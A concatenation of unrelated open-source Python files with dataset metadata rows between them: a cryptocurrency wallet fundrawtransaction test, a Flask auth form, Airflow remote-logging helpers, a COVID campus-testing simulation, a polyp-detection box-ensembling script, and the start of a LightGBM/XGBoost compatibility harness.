addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].validateaddress(addr1)
addr2Obj = self.nodes[2].validateaddress(addr2)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# send 1.2 BTC to msig addr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
oldBalance = self.nodes[1].getbalance()
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[2].fundrawtransaction(rawTx)
signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())
############################################################
# locked wallet test
self.nodes[1].encryptwallet("test")
self.nodes.pop(1)
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
# drain the keypool
self.nodes[1].getnewaddress()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
# fund a transaction that requires a new key for the change output
# creating the key must be impossible because the wallet is locked
try:
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('Keypool ran out' in e.error['message'])
#refill the keypool
self.nodes[1].walletpassphrase("test", 100)
self.nodes[1].walletlock()
try:
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('walletpassphrase' in e.error['message'])
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#now we need to unlock
self.nodes[1].walletpassphrase("test", 100)
signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())
###############################################
# multiple (~19) inputs tx test | Compare fee #
###############################################
#empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[1].sendmany("", outputs)
signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs
#############################################
# multiple (~19) inputs tx test | sign/send #
#############################################
#again, empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward
#####################################################
# test fundrawtransaction with OP_RETURN and no vin #
#####################################################
rawtx = "0100000000010000000000000000066a047465737400000000"
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(len(dec_tx['vin']), 0)
assert_equal(len(dec_tx['vout']), 1)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
assert_equal(len(dec_tx['vout']), 2) # one change output added
##################################################
# test a fundrawtransaction using only watchonly #
##################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, {'includeWatching': True })
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 1)
assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)
assert("fee" in result.keys())
assert_greater_than(result["changepos"], -1)
###############################################################
# test fundrawtransaction using the entirety of watched funds #
###############################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
# Backward compatibility test (2nd param is includeWatching)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 2)
assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)
assert_greater_than(result["fee"], 0)
assert_greater_than(result["changepos"], -1)
assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)
signedtx = self.nodes[3].signrawtransaction(result["hex"])
assert(not signedtx["complete"])
signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
assert(signedtx["complete"])
self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
self.sync_all()
#######################
# Test feeRate option #
#######################
# Make sure there is exactly one input so coin selection can't skew the result
assert_equal(len(self.nodes[3].listunspent(1)), 1)
inputs = []
outputs = {self.nodes[2].getnewaddress() : 1}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx) # uses min_relay_tx_fee (set by settxfee)
result2 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee})
result3 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 10*min_relay_tx_fee})
result_fee_rate = result['fee'] * 1000 / count_bytes(result['hex'])
assert_fee_amount(result2['fee'], count_bytes(result2['hex']), 2 * result_fee_rate)
assert_fee_amount(result3['fee'], count_bytes(result3['hex']), 10 * result_fee_rate)
if __name__ == '__main__':
RawTransactionsTest().main()
| 42.712782 | 223 | 0.562315 |
f5ea4e6cb8675d94cfd4c6ca42e0d7e78759287e | 1,468 | py | Python | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
TextAreaField
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo, \
Length
from app.models import User
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
password2 = PasswordField(
'Repeat Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Register')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Please use a different username')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is not None:
raise ValidationError('Please use a different email address')
class PostForm(FlaskForm):
post = TextAreaField('Say something', validators=[
DataRequired(), Length(min=1, max=140)])
submit = SubmitField('Submit') | 37.641026 | 79 | 0.709128 |
6e18e52d007c7fe8365acf2062a7072ef9f711b5 | 10,090 | py | Python | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 6 | 2016-04-20T20:40:43.000Z | 2022-02-20T10:32:00.000Z | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 8 | 2017-09-07T22:20:35.000Z | 2021-05-14T17:35:27.000Z | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 8 | 2016-04-13T21:22:46.000Z | 2020-07-31T18:31:59.000Z | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import object
import dateutil.parser
import logging
import six
from airflow import configuration
from airflow.exceptions import AirflowException
class LoggingMixin(object):
"""
Convenience super-class to have a logger configured with the class name
"""
@property
def logger(self):
try:
return self._logger
except AttributeError:
self._logger = logging.root.getChild(self.__class__.__module__ + '.' + self.__class__.__name__)
return self._logger
class S3Log(object):
"""
Utility class for reading and writing logs in S3.
Requires airflow[s3] and setting the REMOTE_BASE_LOG_FOLDER and
REMOTE_LOG_CONN_ID configuration options in airflow.cfg.
"""
def __init__(self):
remote_conn_id = configuration.get('core', 'REMOTE_LOG_CONN_ID')
try:
from airflow.hooks.S3_hook import S3Hook
self.hook = S3Hook(remote_conn_id)
except:
self.hook = None
logging.error(
'Could not create an S3Hook with connection id "{}". '
'Please make sure that airflow[s3] is installed and '
'the S3 connection exists.'.format(remote_conn_id))
def log_exists(self, remote_log_location):
"""
Check if remote_log_location exists in remote storage
:param remote_log_location: log's location in remote storage
:return: True if location exists else False
"""
if self.hook:
try:
return self.hook.get_key(remote_log_location) is not None
except Exception:
pass
return False
def read(self, remote_log_location, return_error=False):
"""
Returns the log found at the remote_log_location. Returns '' if no
logs are found or there is an error.
:param remote_log_location: the log's location in remote storage
:type remote_log_location: string (path)
:param return_error: if True, returns a string error message if an
error occurs. Otherwise returns '' when an error occurs.
:type return_error: bool
"""
if self.hook:
try:
s3_key = self.hook.get_key(remote_log_location)
if s3_key:
return s3_key.get_contents_as_string().decode()
except:
pass
# return error if needed
if return_error:
msg = 'Could not read logs from {}'.format(remote_log_location)
logging.error(msg)
return msg
return ''
def write(self, log, remote_log_location, append=True):
"""
Writes the log to the remote_log_location. Fails silently if no hook
was created.
:param log: the log to write to the remote_log_location
:type log: string
:param remote_log_location: the log's location in remote storage
:type remote_log_location: string (path)
:param append: if False, any existing log file is overwritten. If True,
the new log is appended to any existing logs.
:type append: bool
"""
if self.hook:
if append:
old_log = self.read(remote_log_location)
log = '\n'.join([old_log, log])
try:
self.hook.load_string(
log,
key=remote_log_location,
replace=True,
encrypt=configuration.getboolean('core', 'ENCRYPT_S3_LOGS'),
)
except:
logging.error('Could not write logs to {}'.format(remote_log_location))
class GCSLog(object):
"""
Utility class for reading and writing logs in GCS. Requires
airflow[gcp_api] and setting the REMOTE_BASE_LOG_FOLDER and
REMOTE_LOG_CONN_ID configuration options in airflow.cfg.
"""
def __init__(self):
"""
Attempt to create hook with airflow[gcp_api].
"""
remote_conn_id = configuration.get('core', 'REMOTE_LOG_CONN_ID')
self.hook = None
try:
from airflow.contrib.hooks.gcs_hook import GoogleCloudStorageHook
self.hook = GoogleCloudStorageHook(
google_cloud_storage_conn_id=remote_conn_id)
except:
logging.error(
'Could not create a GoogleCloudStorageHook with connection id '
'"{}". Please make sure that airflow[gcp_api] is installed '
'and the GCS connection exists.'.format(remote_conn_id))
def log_exists(self, remote_log_location):
"""
Check if remote_log_location exists in remote storage
:param remote_log_location: log's location in remote storage
:return: True if location exists else False
"""
if self.hook:
try:
bkt, blob = self.parse_gcs_url(remote_log_location)
return self.hook.exists(bkt, blob)
except Exception:
pass
return False
def read(self, remote_log_location, return_error=False):
"""
Returns the log found at the remote_log_location.
:param remote_log_location: the log's location in remote storage
:type remote_log_location: string (path)
:param return_error: if True, returns a string error message if an
error occurs. Otherwise returns '' when an error occurs.
:type return_error: bool
"""
if self.hook:
try:
bkt, blob = self.parse_gcs_url(remote_log_location)
return self.hook.download(bkt, blob).decode()
except:
pass
# return error if needed
if return_error:
msg = 'Could not read logs from {}'.format(remote_log_location)
logging.error(msg)
return msg
return ''
def write(self, log, remote_log_location, append=True):
"""
Writes the log to the remote_log_location. Fails silently if no hook
was created.
:param log: the log to write to the remote_log_location
:type log: string
:param remote_log_location: the log's location in remote storage
:type remote_log_location: string (path)
:param append: if False, any existing log file is overwritten. If True,
the new log is appended to any existing logs.
:type append: bool
"""
if self.hook:
if append:
old_log = self.read(remote_log_location)
log = '\n'.join([old_log, log])
try:
bkt, blob = self.parse_gcs_url(remote_log_location)
from tempfile import NamedTemporaryFile
with NamedTemporaryFile(mode='w+') as tmpfile:
tmpfile.write(log)
# Force the file to be flushed, since we're doing the
# upload from within the file context (it hasn't been
# closed).
tmpfile.flush()
self.hook.upload(bkt, blob, tmpfile.name)
except:
logging.error('Could not write logs to {}'.format(remote_log_location))
def parse_gcs_url(self, gsurl):
"""
Given a Google Cloud Storage URL (gs://<bucket>/<blob>), returns a
tuple containing the corresponding bucket and blob.
"""
# Python 3
try:
from urllib.parse import urlparse
# Python 2
except ImportError:
from urlparse import urlparse
parsed_url = urlparse(gsurl)
if not parsed_url.netloc:
raise AirflowException('Please provide a bucket name')
else:
bucket = parsed_url.netloc
blob = parsed_url.path.strip('/')
return (bucket, blob)
# TODO: get_log_filename and get_log_directory are temporary helper
# functions to get airflow log filename. Logic of using FileHandler
# will be extract out and those two functions will be moved.
# For more details, please check issue AIRFLOW-1385.
def get_log_filename(dag_id, task_id, execution_date, try_number):
"""
Return relative log path.
:arg dag_id: id of the dag
:arg task_id: id of the task
:arg execution_date: execution date of the task instance
:arg try_number: try_number of current task instance
"""
relative_dir = get_log_directory(dag_id, task_id, execution_date)
# For reporting purposes and keeping logs consistent with web UI
# display, we report based on 1-indexed, not 0-indexed lists
filename = "{}/{}.log".format(relative_dir, try_number+1)
return filename
def get_log_directory(dag_id, task_id, execution_date):
"""
Return log directory path: dag_id/task_id/execution_date
:arg dag_id: id of the dag
:arg task_id: id of the task
:arg execution_date: execution date of the task instance
"""
# execution_date could be parsed in as unicode character
# instead of datetime object.
if isinstance(execution_date, six.string_types):
execution_date = dateutil.parser.parse(execution_date)
iso = execution_date.isoformat()
relative_dir = '{}/{}/{}'.format(dag_id, task_id, iso)
return relative_dir
| 36.035714 | 107 | 0.625273 |
116fa9b1d06eda895a6c64059bddfe9d1fa672f2 | 6,493 | py | Python | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | null | null | null | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | null | null | null | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | 1 | 2021-08-02T19:08:30.000Z | 2021-08-02T19:08:30.000Z | """
Author: Hali Hambridge
This code was run in parallel on a computing cluster using the following bash command:
python beta003_noNPI_vax_locom.py $SLURM_ARRAY_TASK_ID
Dependencies: pandas, networkx, numpy, matplotlib, itertools, time
-------------------
Parameter Settings
-------------------
Transmission probability (beta) = 0.003078 per 5 minute exposure, roughly R0 ~ 1.5
Testing Frequencies: every 3, 7, 14, 28 days and symptomatic only
Proportion Vaccinated: 0%, 20%, 40%, 60%, 80%
Probability of External Infection: iid normal(loc = 0.0005, scale = 0.0001),
roughly 0.3 people infected by outside source each day in a fully susceptible population,
corresponds to low community transmission scenario in paper
Proportion Mask Wearing: 0%
Proportion Social Distancing: 0%
-------------------
File Outputs
-------------------
beta003_noNPI_vax_locom_detailed_0.csv
beta003_noNPI_vax_locom_detailed_1.csv
beta003_noNPI_vax_locom_detailed_2.csv
beta003_noNPI_vax_locom_detailed_3.csv
beta003_noNPI_vax_locom_detailed_4.csv
"""
import os
import sys
import pandas as pd
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import itertools
import time
from testing_freq import *
from utils import *
# Parse command line arguments
TASKID = int(sys.argv[1])
myseed = TASKID*50000
print('TASKID: ', TASKID)
print('myseed: ', myseed)
sim_name = 'beta003_noNPI_vax_locom'
test_freqs = [0, 3, 7, 14, 28]
time_step = 86400 # one day
nreps = 20
# Read Copenhagen Network Study data
bt = pd.read_csv('bt_data_clean.csv', header = 0, names = ['timestamp','user_a', 'user_b', 'rssi'])
# Construct adjacency matrices
adj_mats, df = construct_adj_mat(bt, time_step = time_step, data_loops = 3, dist_thres = -75)
# Set parameters for simulations
disease_params = dict()
disease_params['asymp'] = 0.3 # 30% remain symptom free for the duration, other pre-symptomatic
disease_params['beta'] = gen_trans_prob(n_nodes = adj_mats.shape[1], univ_val = 0.003078) # Roughly corresponds to R0 = 1.5
disease_params['sigma_a'] = 1/3 # average incubation period is 3 days
disease_params['sigma_s'] = 1/3
disease_params['gamma_a'] = 1/7 # mild to moderate infectious no longer than 10 days (per CDC)
disease_params['gamma_s'] = 1/12 # severe illness infectious no longer than 20 days after symptom onset
disease_params['n_time_day'] = 1
test_params = dict()
test_params['spec'] = 0.99
test_params['symp_test_delay'] = gen_symp_test_delay(n_nodes = adj_mats.shape[1], univ_delay = 3)
test_params['time_dep'] = True
test_params['time_dep_type'] = 'W'
# % of people seeking testing at each time step, even though not sick -- this is about 3 people per day
test_params['false_symp'] = 0.005
quar_params = dict()
quar_params['quar_delay'] = gen_quar_delay(n_nodes = adj_mats.shape[1], univ_delay = 1)
quar_params['quar_len'] = 10 # 10 day quarantine
# Create the beta scenarios
vax_props = np.linspace(0, 0.8, 5)
beta_scenarios = list(vax_props)
# Create empty df for output
df_out = pd.DataFrame()
# Create empty df for detailed output
det_df_out = pd.DataFrame()
# Loop through each of the beta scenarios
for scenario in beta_scenarios:
p_vax = scenario
"""
RUN SIMULATION FOR TESTING SCENARIOS
"""
# Loop through each of the testing frequencies to consider
for tf in test_freqs:
# Set the testing frequency
test_params['test_freq'] = tf
# Run simulation with testing and isolation
for i in range(nreps):
# Set the parameters that are probabilistic
rs = np.random.RandomState(myseed)
disease_params['ext_inf'] = rs.normal(loc = 0.0005, scale = 0.0001, size = 1) # about 0.3 people infected by outside source each day in a fully susceptible population
while disease_params['ext_inf']<0:
disease_params['ext_inf'] = rs.normal(loc = 0.0005, scale = 0.0001, size = 1)
disease_params['init_status'] = gen_init_status(n_nodes = adj_mats.shape[1], asymp = disease_params['asymp'], n_init_inf = 1, n_init_rec = int(adj_mats.shape[1]*p_vax), seed = myseed)
test_params['nc_schd'] = rs.normal(loc = 0.025, scale = 0.01, size = 1) # Percent non-compliant with scheduled testing
while test_params['nc_schd']<0:
test_params['nc_schd'] = rs.normal(loc = 0.025, scale = 0.01, size = 1) # Percent non-compliant with scheduled testing
test_params['nc_symp'] = rs.normal(loc = 0.25, scale = 0.1, size = 1) # Percent non-compliant with symptomatic testing
while test_params['nc_symp']<0:
test_params['nc_symp'] = rs.normal(loc = 0.25, scale = 0.1, size = 1) # Percent non-compliant with symptomatic testing
quar_params['quar_comp'] = gen_quar_comp(n_nodes = adj_mats.shape[1], seed = myseed)
# Instantiate the simulation class
testin = TestFreq(adj_mats, disease_params, test_params, quar_params)
# Run the simulation
(ia_nodes_byt, is_nodes_byt, test_pos_schd_byt, test_pos_symp_byt, q_schd_byt, q_symp_byt) = testin.sim_spread_test(seed = myseed)
# Save detailed results
tmpdf = pd.DataFrame.from_dict({'rep': np.repeat(i+1, repeats = len(ia_nodes_byt)), 'p_vax': np.repeat(p_vax, repeats = len(ia_nodes_byt)),
'tstep': list(range(len(ia_nodes_byt))), 'ext_inf_ct': np.repeat(testin.ext_ict, repeats = len(ia_nodes_byt)),
'test_freq': np.repeat(tf, repeats = len(ia_nodes_byt)),
'ia_nodes': ia_nodes_byt, 'is_nodes': is_nodes_byt, 'test_pos_schd': test_pos_schd_byt, 'test_pos_symp': test_pos_symp_byt,
'q_schd': q_schd_byt, 'q_symp': q_symp_byt})
det_df_out = det_df_out.append(tmpdf, ignore_index = True)
# Save aggregate results
# Flatten the results
flat_ia = [x for l in ia_nodes_byt for x in l]
flat_is = [x for l in is_nodes_byt for x in l]
# Save the results
tmpdf = pd.DataFrame.from_dict({'rep': [i+1], 'test_freq': [tf], 'p_vax': [p_vax], 'cum_uniq_inf': [len(set(flat_ia + flat_is))]})
df_out = df_out.append(tmpdf, ignore_index = True)
# Update the seed
myseed +=1
# Save out the pandas dataframe results
df_out.to_csv(sim_name + '_' + str(TASKID) + '.csv', index = False)
det_df_out.to_csv(sim_name + '_detailed_' + str(TASKID) + '.csv', index = False)
| 43 | 195 | 0.684583 |
93a4ea1f8a22e49332e64ce64bfad03dd93e2f3a | 5,930 | py | Python | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | 4 | 2021-05-29T19:02:19.000Z | 2021-12-17T13:53:45.000Z | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | null | null | null | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | null | null | null | # Created by Gorkem Polat at 14.03.2021
# contact: polatgorkem@gmail.com
import glob
import os
import json
import shutil
from ensemble_boxes import *
import argparse
import time
# parser = argparse.ArgumentParser(description='EndoCV2021: inference on test set, by Ece Isik Polat')
# parser.add_argument("-it", "--iou_threshold", type=float, default=0.3)
# args = parser.parse_args()
weights = [1, 1, 1, 1]
# iou_thr = args.iou_threshold
iou_thr = 0.5 # Be careful on here! normal = 0.4
skip_box_thr = 0.0001
# predicted_path_list = ["test_kvasir_bbox_results_0.json",
# "test_kvasir_bbox_results_1.json",
# "test_kvasir_bbox_results_2.json",
# "test_kvasir_bbox_results_3.json"]
# ground_truth_path = '/home/ws2080/Desktop/data/EndoCV2021/edited_files/paper/Kvasir-SEG/kvasir_seg_COCO.json'
# target_file = "ensemble_kvasir.json"
# predicted_path_list = ["test_kvasir_mini_test_bbox_results_0.json",
# "test_kvasir_mini_test_bbox_results_1.json",
# "test_kvasir_mini_test_bbox_results_2.json",
# "test_kvasir_mini_test_bbox_results_3.json"]
# ground_truth_path = '/home/ws2080/Desktop/data/EndoCV2021/edited_files/paper/Kvasir-SEG/kvasir_seg_test_COCO.json'
# target_file = "ensemble_kvasir_test.json"
predicted_path_list = ["test_kvasir_model_on_endocv_center_bbox_results_0.json",
"test_kvasir_model_on_endocv_center_bbox_results_1.json",
"test_kvasir_model_on_endocv_center_bbox_results_2.json",
"test_kvasir_model_on_endocv_center_bbox_results_3.json"]
ground_truth_path = 'datasets/polyps_all_centers/annotations/instances_test.json'
target_file = "ensemble_kvasir_on_endocv_center.json"
def calculate_normalized_voc_given_json_path(predicted_path, ground_truth_path):
f1 = open(predicted_path)
json_dict = json.load(f1)
f2 = open(ground_truth_path)
originals = json.load(f2)
organized_json_dict = []
organized_counter = 0
for i in range(len(json_dict)):
image_id = json_dict[i]["image_id"]
image_width = originals["images"][image_id]["width"]
image_height = originals["images"][image_id]["height"]
x1 = json_dict[i]["bbox"][0]
y1 = json_dict[i]["bbox"][1]
w = json_dict[i]["bbox"][2]
h = json_dict[i]["bbox"][3]
x2 = x1 + w
y2 = y1 + h
if x2 > image_width:
x2 = image_width
if y2 > image_height:
y2 = image_height
voc = [x1, y1, x2, y2]
normalized = [x1 / image_width, y1 / image_height, x2 / image_width, y2 / image_height]
json_dict[i].update({"voc": voc})
json_dict[i].update({"normalized": normalized})
if ((x1 < image_width) & (y1 < image_height) & (y2 > y1) & (x2 > x1)):
organized_json_dict.append(json_dict[i])
organized_counter = organized_counter + 1
return organized_json_dict
def get_original_images_id_list(ground_truth_path):
f = open(ground_truth_path)
json_dict = json.load(f)
original_images_ids = []
for org_img in json_dict["images"]:
original_images_ids.append(org_img["id"])
return original_images_ids
original_images_ids = get_original_images_id_list(ground_truth_path)
total_elapsed = 0
def get_enseble_results(predicted_path_list, ground_truth_path):
global total_elapsed
f_gt = open(ground_truth_path)
gt_dict = json.load(f_gt)
original_images_id_list = get_original_images_id_list(ground_truth_path)
fusion_dict = []
for image_id in original_images_id_list:
boxes_list = []
scores_list = []
labels_list = []
for json_path in predicted_path_list:
start = time.time()
json_dict = calculate_normalized_voc_given_json_path(json_path, ground_truth_path)
image_annotations = [x for x in json_dict if x["image_id"] == image_id]
bb = []
scr = []
lbl = []
for ann in image_annotations:
for j in range(4):
if (ann["normalized"][j] < 0):
print(json_path, ann["id"], image_id, ann["normalized"][j])
if (ann["normalized"][j] > 1):
print(json_path, ann["id"], image_id, ann["normalized"][j])
bb.append(ann["normalized"])
scr.append(ann["score"])
lbl.append(1)
boxes_list.append(bb)
scores_list.append(scr)
labels_list.append(lbl)
boxes, scores, labels = weighted_boxes_fusion(boxes_list, scores_list, labels_list, weights=weights,
iou_thr=iou_thr, skip_box_thr=skip_box_thr)
end = time.time()
total_elapsed += (end - start)
image_width = gt_dict["images"][image_id]["width"]
image_height = gt_dict["images"][image_id]["height"]
annotation_counter = 0
for i in range(len(scores)):
x1 = int(boxes[i, 0] * image_width)
y1 = int(boxes[i, 1] * image_height)
x2 = int(boxes[i, 2] * image_width)
y2 = int(boxes[i, 3] * image_height)
object_width = x2 - x1
object_height = y2 - y1
annotation_dict = {}
annotation_dict["image_id"] = image_id
annotation_dict["category_id"] = 1
annotation_dict["score"] = scores[i].astype(float)
annotation_dict["bbox"] = [x1, y1, object_width, object_height]
fusion_dict.append(annotation_dict)
annotation_counter += 1
with open(target_file, "w") as outfile:
json.dump(fusion_dict, outfile)
get_enseble_results(predicted_path_list, ground_truth_path)
print(total_elapsed)
print(total_elapsed / 1000)
| 35.722892 | 116 | 0.63339 |
c559c89dabb3d7e0e5cf86989eece9dff6ef9022 | 6,116 | py | Python | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 334 | 2018-09-16T09:33:49.000Z | 2022-03-21T21:00:07.000Z | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 76 | 2018-09-15T17:38:40.000Z | 2022-03-31T14:23:44.000Z | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 62 | 2018-09-18T08:53:30.000Z | 2022-02-28T22:58:31.000Z | from string import Template
from compatibility_core import Case, LibraryType
LIGHTGBM_VERSIONS = [
'2.3.0',
'2.2.3',
'2.2.2',
'2.2.1',
'2.2.0',
'2.1.2',
'2.1.1',
'2.1.0',
'2.0.12',
'2.0.11',
'2.0.10',
]
XGBOOST_VERSIONS = [
'0.90',
'0.82',
'0.72.1',
]
class BaseCase(Case):
files = dict(
model_filename='model.txt',
true_predictions_filename='true_predictions.txt',
predictions_filename='predictions.txt',
data_filename='data.txt',
)
python_template=None
go_template=None
def compare(self):
self.compare_matrices(
matrix1_filename=self.files['true_predictions_filename'],
matrix2_filename=self.files['predictions_filename'],
tolerance=1e-10,
max_number_of_mismatches_ratio=0.0
)
def go_code(self):
return self.go_template.substitute(self.files)
def python_code(self):
return self.python_template.substitute(self.files)
class LGBaseCase(BaseCase):
library = LibraryType.LIGHTGBM
versions = LIGHTGBM_VERSIONS
class XGBaseCase(BaseCase):
library = LibraryType.XGBOOST
versions = XGBOOST_VERSIONS
class LGBreastCancer(LGBaseCase):
python_template = Template("""
import lightgbm as lgb
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
X, y = datasets.load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
n_estimators = 30
d_train = lgb.Dataset(X_train, label=y_train)
params = {
'boosting_type': 'gbdt',
'objective': 'binary',
}
clf = lgb.train(params, d_train, n_estimators)
